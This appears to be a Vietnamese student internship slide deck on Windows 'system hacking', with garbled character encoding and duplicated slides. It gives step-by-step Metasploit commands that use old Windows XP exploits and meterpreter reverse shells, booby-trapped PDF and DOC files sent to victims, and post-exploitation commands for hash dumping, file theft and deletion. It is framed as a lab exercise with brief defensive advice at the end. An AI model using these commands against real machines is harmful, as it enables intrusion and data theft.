ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo
BÃO CÃO THá»°C TẬP SYSTEM 
HACKING 
GVHD: T . VÕ Äá»– THẮNG 
SVTT: HUỲNH DƯƠNG KHANG
Giới thiệu 
Thực hiện 
Tổng kết
Giới thiệu 
• Theo thống kê của công ty Bkav, từ đầu năm 2013 
đến nay, tại Việt Nam đã có 2.405 website của các 
cơ quan, doanh nghiệp bị xâm nhập, trung bình 
mỗi tháng có khoảng 300 website bị tấn công 
• Hiện nay, các thiết bị như máy tính PC, laptop, 
Ä‘á»u có kết nối mạng ná»™i bá»™ hoặc kết nối Internet . 
Trên các thiết bị này, hầu hết cài đặt các phần 
má»m ứng dụng nhÆ° IE, Microsoft Office, Adobe 
Reader ,…. và chạy hệ Ä‘iá»u hành nhÆ° Windows 
XP, Windows 7…
Giới thiệu system hacking 
Gồm những kỹ thuật lấy username, password dựa vào phần 
má»m cài trên hệ thống hoặc các dịch vụ từ xa của hệ Ä‘iá»u 
hành Windows 
Nâng quyá»n trong hệ thống, sá»­ dụng keyloger để lấy thông 
tin, xóa những log file hệ thống 
Hacker có thể thá»±c hiện má»i thứ trên máy tính đó, gây ra 
những hậu quả vô cùng nghiêm trá»ng cho các cá nhân, tổ 
chức
Các lá»— hổng thÆ°á»ng khai thác trong hệ Ä‘iá»u hành 
Windows 
Như chúng ta đã biết, 
Windows là hệ Ä‘iá»u hành 
phổ biến và được sử 
dụng rộng rãi nhất trên 
thế giới hiện nay 
Hack
1.Xuất hiện một lỗ hổng có thể bị khai thác bằng các công nghệ 
hiện có. 
2.Kẻ tấn công phát hiện lỗ hổng. 
3.Kẻ này lập tức tiến hành viết và phát tán công cụ khai thác lỗ 
hổng này. 
4.Hãng sản xuất đồng thá»i phát hiện lá»—i và lập tức tìm cách sá»­a 
chữa 
5.Lỗ hổng được công bố ra ngoài 
6.Các phần má»m anti-virus được cập nhật thông tin để phát hiện 
khi có các đoạn mã tìm cách khai thác lỗ hổng này 
7.Hãng sản xuất hoàn thành bản vá 
8.Hãng hoàn tất phát hành bản vá lỗi đến tất cả khách hàng 
Các hãng sản xuất luôn cập nhật các lỗ hổng và 
đưa ra các phiên bản mới sau khi đã vá lại các lỗ 
hổng của các phiên bản trước. Và luôn theo một 
trình tự
Quá trình tấn công vào một hệ thống 
Tóm lại, quá trình tấn công 
hệ thống (System hacking) 
là bước tiếp theo sau quá 
trình khảo sát, thu thập 
thông tin của mục tiêu cần 
tấn công bằng những kỹ 
thuật như Footprinting, 
Social engineering, 
Enumeration, Google 
Hacking… đã được áp dụng 
cho mục đích truy tìm 
thông tin. 
Execute (thực thi): Thực thi ứng dụng trên hệ thống 
Enumerate (liệt kê): Trích ra tất cả những thông tin có 
thể vỠmáy user đích. trong Chuẩn hệ thống. bị trước Sử malware, dụng phương keylogger, 
pháp 
thăm dò rootkit…SNMP để để có chạy được nó những trên máy thông tính tin tấn hữu công 
ích, 
Hide (ẩn file): Những file thực thi, file soucecode chạy 
chương trình… Cần phải được làm ẩn đi, tránh bị mục 
Crack: Công Ä‘oạn này có lẽ hấp dẫn nhiá»u Hackernhất. 
chính xác hơn 
Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng 
nhập của user. Hoặc bằng một cách nào khác, mục 
Tracks (dấu vết): Tất nhiên không phải là để lại dấu 
vết. Những thông tiêu tin phát có liên hiện quan tiêu đến diệt 
bạn cần phải bị 
xóa sạch, không để lại bất cứ thứ gì. Nếu không khả 
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi 
giá»›i tiêu hạn phải truy đạt cập tá»›i từ là user quyá»n binh truy thÆ°á»ng cập vào lên hệ admin thống 
hoặc 
năng bạn bị phát hiện là kẻ đột nhập là rất cao. 
user có quyá»n cao hÆ¡n đủ cho chúng ta tấn công
Giới thiệu 
Thực hiện 
Tổng kết
VMware workstation 
VMware Workstation là má»™t phần má»m ảo hóa 
desktop mạnh mẽ dành cho các nhà phát 
triển/kiểm tra phần má»m và các chuyên gia IT 
cần chạy nhiá»u HÄH má»™t lúc trên má»™t máy PC. 
NgÆ°á»i dùng có thể chạy các HÄH Windows, 
Linux, Netware hay Solaris x86,.. trên các máy ảo 
di động mà không cần phải khởi động lại hay 
phân vùng ổ cứng
Hệ Ä‘iá»u hành Backtrack 5 R3 
- Backtrack là một bản phân phối dạng Live DVD của 
Linux, được phát triển để thử nghiệm xâm nhập. 
Backtrack là sự hợp nhất giữa 3 bản phân phối khác 
nhau của Linux vỠthâm nhập thử nghiệm IWHAX, 
WHOPPIX, và Auditor. Trong phiên bản hiện tại của 
nó (5), Backtrack được dựa trên phiên bản phân phối 
Linux Ubuntu 11.10. 
- Backtrack 5 chứa một số công cụ có thể được sử 
dụng trong quá trình thử nghiệm thâm nhập của 
chúng ta
Phần má»m Metasploit 
• Metasploit là một dự án bảo mật máy tính 
cung cấp các thông tin vỠvấn đỠlỗ hổng bảo 
mật cũng như giúp đỡ vỠkiểm tra thăm nhập 
và phát triển hệ thống phát hiện tấn công 
mạng 
• Metasploit có thể chạy trên hầu hết các hệ 
Ä‘iá»u hành: Linux, Windows, MacOS.
Sơ đồ tổng quan hệ thống mạng LAN 
Trong một mạng LAN nội bộ, 
các máy tính thÆ°á»ng kết nối 
với nhau với khoảng cách vật lý 
gần như trong một phòng, một 
tầng, một tòa nhà, công ty, … 
Các máy tính trong mạng LAN 
có thể chia sẻ tài nguyên với 
nhau, mà điển hình là chia sẻ 
tập tin, máy in, máy quét và 
một số thiết bị khác
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ há»ng Ms10-042 
• Nhận dạng 
Lỗ hổng này có thể cho phép thực thi mã từ xa 
nếu ngÆ°á»i dùng xem má»™t trang web thiết kế đặc 
biệt bằng cách sử dụng một trình duyệt web 
hoặc nhấp vào một liên kết thiết kế đặc biệt 
trong một thông báo e-mail
Xâm nhập và khai thác 
Windows XP 
• Thực hiện 
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole 
Từ dấu nhắc sử dụng lệnh: msf > search ms10_042 
Copy Ä‘Æ°á»ng dẫn, enter gõ use “dán Ä‘Æ°á»ng dẫn vào†
Gõ show options để thấy các options của lệnh. 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
ºÝºÝߣ báo cáo: System Hacking
Lần lượt gõ các lệnh sau: 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD 
windows/meterpreter/reverse_tcp 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
• Sau khi gõ lệnh exploit để khai thác lỗi ta sẽ 
thấy chương trình đưa ra cho ta 1 URL 
website, lúc này chỉ cần dụ nạn nhân nhập vào 
URL này, ta sẽ tấn công được máy nạn nhân. Ở 
đây URL là 
http://192.168.132.137:80/
Backtrack gửi mã độc qua cho máy nạn nhân
• Gõ lệnh sessions để coi Session đang thực 
hiện, ta thấy có 1 Session đang thực hiện tấn 
công tới máy 192.168.132.138 trên port 1207 
• Gõ lệnh sessions –i 1 
• Ta đã tấn công được vào máy nạn nhân, ta 
thấy máy nạn nhân là Windows XP 32 bit
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ há»ng Ms12-004 
a) Mô tả: 
Các lỗ hổng có thể cho phép thực thi mã 
từ xa nếu ngÆ°á»i dùng mở má»™t tập tin phÆ°Æ¡ng 
tiện truyá»n thông thiết kế đặc biệt 
Một kẻ tấn công khai thác thành công lỗ 
hổng có thể lấy được quyá»n sá»­ dụng giống nhÆ° 
ngÆ°á»i dùng địa phÆ°Æ¡ng
• Cách thực hiện tấn công 
Khởi động msfconsole tử cửa sổ terminal của 
BackTrack 
> msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> Search ms12_004 
> use exploit/windows/browser/ms12_004_midi 
> show options 
> set srvhost 192.168.192.130 
> set lhost 192.168.192.130 
> set payload windows/meterpreter/reverse_tcp 
> exploit
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ há»ng Ms12-004 
• Mô tả: 
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn 
sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho 
nạn nhân, làm thế nào để nạn nhân nhận được 
và mở file có chứa mã độc đó lên
• Thực hiện 
Mô hình: 
Cách khai thác: 
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole 
Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf 
msf > search adobe_pdf 
copy Ä‘Æ°á»ng dẫn, ở đây ta sá»­ dụng adobe_pdf_embedded_exe, enter gõ use “dán 
Ä‘Æ°á»ng dẫn vào†
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe 
Gõ lệnh show options để thấy những option của lỗi 
msf exploit(adobe_pdf_embedded_exe) > show options
Ở đây ta thấy bắt buộc 
phải tạo INFILENAME
Lần lượt gõ các lệnh: 
msf exploit(adobe_pdf_embedded_exe) > set filename 
filemadoc.pdf 
Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình 
có sẵn 1 file infilename.pdf ngoài Desktop. 
msf exploit(adobe_pdf_embedded_exe) > set 
infilename /root/Desktop/infilename.pdf 
msf exploit(adobe_pdf_embedded_exe) > set LHOST 
192.168.119.132
Äịa chỉ này là địa chỉ IP của máy Hacker chính là máy 
BackTrack. 
msf exploit(adobe_pdf_embedded_exe)>set PAYLOAD 
windows/meterpreter/reverse_tcp 
msf exploit(adobe_pdf_embedded_exe) > exploit 
Ta sẽ thấy có một file filemadoc.pdf được tạo ra (đây 
chỉ là ví dụ các bạn đặt tên theo ý mình thích), ta copy 
file “filemadoc.pdf†đã được tạo ra ngoài Desktop cho 
dễ sử dụng 
msf exploit(adobe_pdf_embedded_exe) > cp 
/root/.msf4/local/filemadoc.pdf /root/Desktop
Vậy là việc tạo ra file chứa mã độc đã xong, giỠta gửi file này cho nạn 
nhân để nạn nhân chạy file này là sẽ bị dính mã độc
• Upload file “filemadoc.pdf†lên Webserver bằng cách 
đưa nó vào thư mục “/var/www†
Start Webserver ảo bằng lệnh (mở một cửa số cmd 
khác). 
root@bt:~# service apache2 start 
GiỠta qua máy nạn nhân truy cập vào Webserver 
ta đã dá»±ng và tải file “filemadoc.doc†vá».
Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào
• Tạo ra một trình lắng nghe 
msf exploit(adobe_pdf_embedded_exe) > use 
exploit/multi/handler 
msf exploit(handler) > set payload 
windows/meterpreter/reverse_tcp 
msf exploit(handler) >set LHOST 
192.168.119.132 
msf exploit(handler) > exploit
Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn 
nhân 
Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 
192.168.119.129:1210 
GiỠta có thể khai thác được máy nạn nhân
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ há»ng Ms12-004 
• Mô tả 
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn 
sẽ tạo ra một file mã độc có đuôi .doc và gửi cho 
nạn nhân, làm thế nào để nạn nhân nhận được 
và mở file có chứa mã độc đó lên
• Thực hiện: 
Mô hình: 
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole 
Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf 
msf > search ms12_027 
copy Ä‘Æ°á»ng dẫn, enter gõ use “dán Ä‘Æ°á»ng dẫn vào†
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof 
Gõ lệnh show options để thấy những option của lỗi 
msf exploit(ms12_027_mscomctl_bof) > show options
Ở đây ta thấy bắt buộc phải tạo FILENAME
• Lần lượt gõ các lệnh: 
msf exploit(ms12_027_mscomctl_bof) > set filename 
filemadoc.doc 
• Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây 
chỉ là ví dụ các bạn đặt tên theo ý mình thích) 
msf exploit(ms12_027_mscomctl_bof) > set payload 
windows/meterpreter/reverse_tcp 
msf exploit(ms12_027_mscomctl_bof) > set LHOST 
192.168.119.132 
• Äịa chỉ này là địa chỉ IP của máy Hacker chính là máy 
BackTrack. 
msf exploit(ms12_027_mscomctl_bof) > exploit 
• Gõ lệnh exploit để thực thi
msf exploit(ms12_027_mscomctl_bof) > cp 
/root/.msf4/local/filemadoc.doc /root/Desktop 
ta copy file “filemadoc.doc†đã được tạo ra ngoài 
Desktop cho dễ sử dụng. 
Vậy là việc tạo ra file chứa mã độc đã xong, giỠta gửi file này cho 
nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc
Tấn công hệ thống sau khi tấn công 
• Xem thông tin hệ thống: 
> getuid 
>Sysinfo 
• Tải lên và đánh cắp tài liệu 
• Tải file abc.txt tại Desktop của Back Track lên ổ C 
của XP 
> upload /root/Desktop/abc.txt C:/ 
• Äánh cắp file xyz.txt tại ổ C của XP và Ä‘em vá» 
Desktop của Back Track 
> download C:/xyz.txt /root/Desktop
• Lấy hashpass: 
>Haskdump 
• Khám phá ổ đĩa: 
meterpreter> shell 
• Chuyển dấu nhắc sang ổ đĩa C: 
> cd c: 
• Liệt kê tài nguyên trong ổ C: 
> dir 
• Tạo thư mục abc trong ổ C: 
> md abc 
• Xóa thư mục abc trong ổ C: 
> rd abc 
• Xóa file abc.txt trong ổ C: 
> del abc.txt 
• Trở vỠmeterpreter: 
> exit
Giới thiệu 
Thực hiện 
Tổng kết
TỔNG KẾT 
• Mật khẩu phải được đặt nhiá»u hÆ¡n 8 ký tá»± và 
phải là tổng hợp giữa chữ hoa, chữ thÆ°á»ng, số 
và ký tự đặc biệt để các chương trình khó dò 
ra 
• Không mở tập tin đính kèm thư điện tử có 
nguồn gốc không rõ ràng hoặc không tin cậy 
• Chắc chắn rằng bạn có và đã bật hệ thống 
tÆ°á»ng lá»­a cho hệ thống của mình.
ºÝºÝߣ báo cáo: System Hacking

More Related Content

ºÝºÝߣ báo cáo: System Hacking

  • 1. BÃO CÃO THá»°C TẬP SYSTEM HACKING GVHD: T . VÕ Äá»– THẮNG SVTT: HUỲNH DƯƠNG KHANG
  • 2. Giá»›i thiệu Thá»±c hiện Tổng kết
  • 3. Giá»›i thiệu • Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cÆ¡ quan, doanh nghiệp bị xâm nhập, trung bình má»—i tháng có khoảng 300 website bị tấn công • Hiện nay, các thiết bị nhÆ° máy tính PC, laptop, Ä‘á»u có kết nối mạng ná»™i bá»™ hoặc kết nối Internet . Trên các thiết bị này, hầu hết cài đặt các phần má»m ứng dụng nhÆ° IE, Microsoft Office, Adobe Reader ,…. và chạy hệ Ä‘iá»u hành nhÆ° Windows XP, Windows 7…
  • 4. Giá»›i thiệu system hacking Gồm những kỹ thuật lấy username, password dá»±a vào phần má»m cài trên hệ thống hoặc các dịch vụ từ xa của hệ Ä‘iá»u hành Windows Nâng quyá»n trong hệ thống, sá»­ dụng keyloger để lấy thông tin, xóa những log file hệ thống Hacker có thể thá»±c hiện má»i thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trá»ng cho các cá nhân, tổ chức
  • 5. Các lá»— hổng thÆ°á»ng khai thác trong hệ Ä‘iá»u hành Windows NhÆ° chúng ta đã biết, Windows là hệ Ä‘iá»u hành phổ biến và được sá»­ dụng rá»™ng rãi nhất trên thế giá»›i hiện nay Hack
  • 6. 1.Xuất hiện má»™t lá»— hổng có thể bị khai thác bằng các công nghệ hiện có. 2.Kẻ tấn công phát hiện lá»— hổng. 3.Kẻ này lập tức tiến hành viết và phát tán công cụ khai thác lá»— hổng này. 4.Hãng sản xuất đồng thá»i phát hiện lá»—i và lập tức tìm cách sá»­a chữa 5.Lá»— hổng được công bố ra ngoài 6.Các phần má»m anti-virus được cập nhật thông tin để phát hiện khi có các Ä‘oạn mã tìm cách khai thác lá»— hổng này 7.Hãng sản xuất hoàn thành bản vá 8.Hãng hoàn tất phát hành bản vá lá»—i đến tất cả khách hàng Các hãng sản xuất luôn cập nhật các lá»— hổng và Ä‘Æ°a ra các phiên bản má»›i sau khi đã vá lại các lá»— hổng của các phiên bản trÆ°á»›c. Và luôn theo má»™t trình tá»±
  • 7. Quá trình tấn công vào má»™t hệ thống Tóm lại, quá trình tấn công hệ thống (System hacking) là bÆ°á»›c tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật nhÆ° Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin. Execute (thá»±c thi): Thá»±c thi ứng dụng trên hệ thống Enumerate (liệt kê): Trích ra tất cả những thông tin có thể vá» máy user đích. trong Chuẩn hệ thống. bị trÆ°á»›c Sá»­ malware, dụng phÆ°Æ¡ng keylogger, pháp thăm dò rootkit…SNMP để để có chạy được nó những trên máy thông tính tin tấn hữu công ích, Hide (ẩn file): Những file thá»±c thi, file soucecode chạy chÆ°Æ¡ng trình… Cần phải được làm ẩn Ä‘i, tránh bị mục Crack: Công Ä‘oạn này có lẽ hấp dẫn nhiá»u Hackernhất. chính xác hÆ¡n BÆ°á»›c này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng má»™t cách nào khác, mục Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tiêu tin phát có liên hiện quan tiêu đến diệt bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả Escalste (leo thang): Nói cho dá»… hiểu là chuyển đổi giá»›i tiêu hạn phải truy đạt cập tá»›i từ là user quyá»n binh truy thÆ°á»ng cập vào lên hệ admin thống hoặc năng bạn bị phát hiện là kẻ Ä‘á»™t nhập là rất cao. user có quyá»n cao hÆ¡n đủ cho chúng ta tấn công
  • 8. Giá»›i thiệu Thá»±c hiện Tổng kết
  • 9. VMware workstation VMware Workstation là má»™t phần má»m ảo hóa desktop mạnh mẽ dành cho các nhà phát triển/kiểm tra phần má»m và các chuyên gia IT cần chạy nhiá»u HÄH má»™t lúc trên má»™t máy PC. NgÆ°á»i dùng có thể chạy các HÄH Windows, Linux, Netware hay Solaris x86,.. trên các máy ảo di Ä‘á»™ng mà không cần phải khởi Ä‘á»™ng lại hay phân vùng ổ cứng
  • 10. Hệ Ä‘iá»u hành Backtrack 5 R3 - Backtrack là má»™t bản phân phối dạng Live DVD của Linux, được phát triển để thá»­ nghiệm xâm nhập. Backtrack là sá»± hợp nhất giữa 3 bản phân phối khác nhau của Linux vá» thâm nhập thá»­ nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dá»±a trên phiên bản phân phối Linux Ubuntu 11.10. - Backtrack 5 chứa má»™t số công cụ có thể được sá»­ dụng trong quá trình thá»­ nghiệm thâm nhập của chúng ta
  • 11. Phần má»m Metasploit • Metasploit là má»™t dá»± án bảo mật máy tính cung cấp các thông tin vá» vấn Ä‘á» lá»— hổng bảo mật cÅ©ng nhÆ° giúp đỡ vá» kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng • Metasploit có thể chạy trên hầu hết các hệ Ä‘iá»u hành: Linux, Windows, MacOS.
  • 12. SÆ¡ đồ tổng quan hệ thống mạng LAN Trong má»™t mạng LAN ná»™i bá»™, các máy tính thÆ°á»ng kết nối vá»›i nhau vá»›i khoảng cách vật lý gần nhÆ° trong má»™t phòng, má»™t tầng, má»™t tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên vá»›i nhau, mà Ä‘iển hình là chia sẻ tập tin, máy in, máy quét và má»™t số thiết bị khác
  • 13. Xâm nhập và khai thác Windows XP Khai thác lổ há»ng Ms10-042 • Nhận dạng Lá»— hổng này có thể cho phép thá»±c thi mã từ xa nếu ngÆ°á»i dùng xem má»™t trang web thiết kế đặc biệt bằng cách sá»­ dụng má»™t trình duyệt web hoặc nhấp vào má»™t liên kết thiết kế đặc biệt trong má»™t thông báo e-mail
  • 14. Xâm nhập và khai thác Windows XP • Thá»±c hiện Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sá»­ dụng lệnh: msf > search ms10_042 Copy Ä‘Æ°á»ng dẫn, enter gõ use “dán Ä‘Æ°á»ng dẫn vào†Gõ show options để thấy các options của lệnh. msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
  • 16. Lần lượt gõ các lệnh sau: msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137 msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137 msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
  • 17. • Sau khi gõ lệnh exploit để khai thác lá»—i ta sẽ thấy chÆ°Æ¡ng trình Ä‘Æ°a ra cho ta 1 URL website, lúc này chỉ cần dụ nạn nhân nhập vào URL này, ta sẽ tấn công được máy nạn nhân. Ở đây URL là http://192.168.132.137:80/
  • 18. Backtrack gá»­i mã Ä‘á»™c qua cho máy nạn nhân
  • 19. • Gõ lệnh sessions để coi Session Ä‘ang thá»±c hiện, ta thấy có 1 Session Ä‘ang thá»±c hiện tấn công tá»›i máy 192.168.132.138 trên port 1207 • Gõ lệnh sessions –i 1 • Ta đã tấn công được vào máy nạn nhân, ta thấy máy nạn nhân là Windows XP 32 bit
  • 20. Xâm nhập và khai thác Windows XP Khai thác lổ há»ng Ms12-004 a) Mô tả: Các lá»— hổng có thể cho phép thá»±c thi mã từ xa nếu ngÆ°á»i dùng mở má»™t tập tin phÆ°Æ¡ng tiện truyá»n thông thiết kế đặc biệt Má»™t kẻ tấn công khai thác thành công lá»— hổng có thể lấy được quyá»n sá»­ dụng giống nhÆ° ngÆ°á»i dùng địa phÆ°Æ¡ng
  • 21. • Cách thá»±c hiện tấn công Khởi Ä‘á»™ng msfconsole tá»­ cá»­a sổ terminal của BackTrack > msfconsole Khai báo lá»— hổng sá»­ dụng và thiết đặt options: > Search ms12_004 > use exploit/windows/browser/ms12_004_midi > show options > set srvhost 192.168.192.130 > set lhost 192.168.192.130 > set payload windows/meterpreter/reverse_tcp > exploit
  • 22. Xâm nhập và khai thác Windows XP Khai thác lổ há»ng Ms12-004 • Mô tả: Nguyên tắc khai thác lá»—i ở đây khá Ä‘Æ¡n giản, bạn sẽ tạo ra má»™t file mã Ä‘á»™c có Ä‘uôi .pdf và gá»­i cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã Ä‘á»™c đó lên
  • 23. • Thá»±c hiện Mô hình: Cách khai thác: Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sá»­ dụng lệnh dÆ°á»›i để search mã lá»—i trong msf msf > search adobe_pdf copy Ä‘Æ°á»ng dẫn, ở đây ta sá»­ dụng adobe_pdf_embedded_exe, enter gõ use “dán Ä‘Æ°á»ng dẫn vào†msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Gõ lệnh show options để thấy những option của lá»—i msf exploit(adobe_pdf_embedded_exe) > show options
  • 24. Ở đây ta thấy bắt buá»™c phải tạo INFILENAME
  • 25. Lần lượt gõ các lệnh: msf exploit(adobe_pdf_embedded_exe) > set filename filemadoc.pdf Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình có sẵn 1 file infilename.pdf ngoài Desktop. msf exploit(adobe_pdf_embedded_exe) > set infilename /root/Desktop/infilename.pdf msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.119.132
  • 26. Äịa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack. msf exploit(adobe_pdf_embedded_exe)>set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > exploit Ta sẽ thấy có má»™t file filemadoc.pdf được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích), ta copy file “filemadoc.pdf†đã được tạo ra ngoài Desktop cho dá»… sá»­ dụng msf exploit(adobe_pdf_embedded_exe) > cp /root/.msf4/local/filemadoc.pdf /root/Desktop
  • 27. Vậy là việc tạo ra file chứa mã Ä‘á»™c đã xong, giá» ta gá»­i file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã Ä‘á»™c
  • 28. • Upload file “filemadoc.pdf†lên Webserver bằng cách Ä‘Æ°a nó vào thÆ° mục “/var/www†Start Webserver ảo bằng lệnh (mở má»™t cá»­a số cmd khác). root@bt:~# service apache2 start Giá» ta qua máy nạn nhân truy cập vào Webserver ta đã dá»±ng và tải file “filemadoc.doc†vá».
  • 29. Khi nạn nhân mở file lên thì mã Ä‘á»™c sẽ được tiêm vào
  • 30. • Tạo ra má»™t trình lắng nghe msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.119.132 msf exploit(handler) > exploit
  • 31. Kiểm tra máy hacker ta thấy mã Ä‘á»™c đã được tiêm vào máy nạn nhân Mã Ä‘á»™c đã được tiêm từ máy 192.168.119.132:4444 tá»›i máy 192.168.119.129:1210 Giá» ta có thể khai thác được máy nạn nhân
  • 32. Xâm nhập và khai thác Windows XP Khai thác lổ há»ng Ms12-004 • Mô tả Nguyên tắc khai thác lá»—i ở đây khá Ä‘Æ¡n giản, bạn sẽ tạo ra má»™t file mã Ä‘á»™c có Ä‘uôi .doc và gá»­i cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã Ä‘á»™c đó lên
  • 33. • Thá»±c hiện: Mô hình: Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sá»­ dụng lệnh dÆ°á»›i để search mã lá»—i trong msf msf > search ms12_027 copy Ä‘Æ°á»ng dẫn, enter gõ use “dán Ä‘Æ°á»ng dẫn vào†msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof Gõ lệnh show options để thấy những option của lá»—i msf exploit(ms12_027_mscomctl_bof) > show options
  • 34. Ở đây ta thấy bắt buá»™c phải tạo FILENAME
  • 35. • Lần lượt gõ các lệnh: msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc • Ta sẽ thấy có má»™t file filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích) msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132 • Äịa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack. msf exploit(ms12_027_mscomctl_bof) > exploit • Gõ lệnh exploit để thá»±c thi
  • 36. msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc /root/Desktop ta copy file “filemadoc.doc†đã được tạo ra ngoài Desktop cho dá»… sá»­ dụng. Vậy là việc tạo ra file chứa mã Ä‘á»™c đã xong, giá» ta gá»­i file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã Ä‘á»™c
  • 37. Tấn công hệ thống sau khi tấn công • Xem thông tin hệ thống: > getuid >Sysinfo • Tải lên và đánh cắp tài liệu • Tải file abc.txt tại Desktop của Back Track lên ổ C của XP > upload /root/Desktop/abc.txt C:/ • Äánh cắp file xyz.txt tại ổ C của XP và Ä‘em vá» Desktop của Back Track > download C:/xyz.txt /root/Desktop
  • 38. • Lấy hashpass: >Haskdump • Khám phá ổ Ä‘Ä©a: meterpreter> shell • Chuyển dấu nhắc sang ổ Ä‘Ä©a C: > cd c: • Liệt kê tài nguyên trong ổ C: > dir • Tạo thÆ° mục abc trong ổ C: > md abc • Xóa thÆ° mục abc trong ổ C: > rd abc • Xóa file abc.txt trong ổ C: > del abc.txt • Trở vá» meterpreter: > exit
  • 39. Giá»›i thiệu Thá»±c hiện Tổng kết
  • 40. Tá»”NG KẾT • Mật khẩu phải được đặt nhiá»u hÆ¡n 8 ký tá»± và phải là tổng hợp giữa chữ hoa, chữ thÆ°á»ng, số và ký tá»± đặc biệt để các chÆ°Æ¡ng trình khó dò ra • Không mở tập tin đính kèm thÆ° Ä‘iện tá»­ có nguồn gốc không rõ ràng hoặc không tin cậy • Chắc chắn rằng bạn có và đã bật hệ thống tÆ°á»ng lá»­a cho hệ thống của mình.

Editor's Notes